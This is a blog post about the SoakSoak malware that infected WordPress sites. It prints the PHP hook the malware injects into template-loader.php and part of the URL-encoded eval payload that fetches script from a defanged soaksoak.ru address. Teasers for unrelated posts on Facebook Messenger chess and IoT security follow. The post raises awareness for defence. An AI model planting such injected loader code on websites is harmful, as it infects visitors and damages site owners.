Skip to main content

100,000+ WordPress Websites infected By SoakSoak Malware

http://knowledgepowerworldwide.blogspot.in/
WordPress is the Best Content Management System (CMS) and number of bloggers and internet marketers uses WordPress CMS for their blog because of its simplicity and awesomeness.

But Recently more than 100,000 WordPress websites/blogs are affected by the SoakSoak Malware. And millions of websites on the internet are currently using WordPress and this Malware can be the great threat.

How to know whether your WordPress websites are infected by SoakSoak Malware ?

Once you are infected with this Malware then you might experience some unexpected redirection to SoakSoack.ru and you will end up downloading malicious files in your computer without your knowledge. 



 Google (The Search Engine giant) has added more than 10,000+ WordPress websites to their blacklisted sites to protect the users and that can effect the revenue of the website owners.


What dose SoakSoak Malware do to your WordPress Website/blog ?

http://knowledgepowerworldwide.blogspot.in/

The SoakSoak Malware simply modifies the php file located at wp-includes/template-loader.php and then it will add malicious JavaScript code named "swobject.js"and it will load everytime the user opens your site.
It is modifying the file wp-includes/template-loader.php and including this content:
<?php
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');
This causes the wp-includes/js/swfobject.js to be loaded on every page you view on the site which includes the malware here:
eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));
This malware when decoded loads a javascript malware from the SoakSoack.ru domain, specifically this file: hxxp://soaksoak.ru/xteas/code

Labels:

Comments

Post a Comment

Popular posts from this blog

How to Unlock (and Play) Hidden Chess Game Inside Facebook Messenger

What can you do with Facebook Messenger? Chat with your friends Send GIFs, stickers, and photos Make video calls Send people money in Messenger Have you ever wondered to Play a game while you chat with friends? Yes, it is possible. Facebook had made it to the reality by building a hidden built-in functionality in Facebook Messenger that lets you play Chess with your friends without having to install a third-party app. It just takes one simple step to unlock this hidden game. All you need to do is: type " @fbchess play " and hit Enter, during a conversation, and a small square box would appear in the chat box. Here's how to play: The person who initiated the game would be assigned "White" side, to make the first movement. Although there is some standard algebraic notation like:- B for “Bishop” R for “Rook” Q for “Queen” K for “King” N for “Knight” P for “Pawn” Pawns could b...
1 comment
Read more

IoT’s Biggest Challenges : Privacy and Security

E verything today from your mobile to refrigerators to cars are interconnected, which made our life easier. This device collectively called IoT. But they have also created new vulnerabilities for hackers. IoT devices are poised to pervasive in our lives than mobile phones and they have access to sensitive personal data may be your credit card number, banking information and many more. As number of IoT devices constantly increase, security risk also increases. Device manufacture’s doesn't care much regarding device security and consumer have to suffer may he can be hacked and there may be severe consequences. A single security concerns on single device can cause multiple concerns when considering multiple IoT devices interconnected together. IoT devices use some form of cloud service and a mobile application use to access and control device remotely. So it’s very important to understand security risk. Current Scenario : Security Risks Privacy Concerns Many devices co...
Post a Comment
Read more

Internet of Threats!

T he Internet of Things (IoT) is continuing to gain traction with an ever-increasing number of connected devices coming to market. But as tech-savvy consumers begin investing in their first devices for a connected home, what is to stop them becoming a cyber attacker's next target? While still uncommon, we know that cyber attackers are going after connected consumer devices, demonstrated on a massive scale by the group of Russian hackers who published thousands of live-streaming webcam footage from over 250 countries. Unless the manufacturers of connected devices take a holistic approach to bolstering their cyber security efforts, these types of attacks will increase in number. To gain a greater understanding of the cyber security risks that consumers could be exposing themselves to, research was conducted into the cyber security posture of six ‘always-on’ consumer IoT devices. The results were unsettling. Veracode carried out a set of uniform tests across all the...
Post a Comment
Read more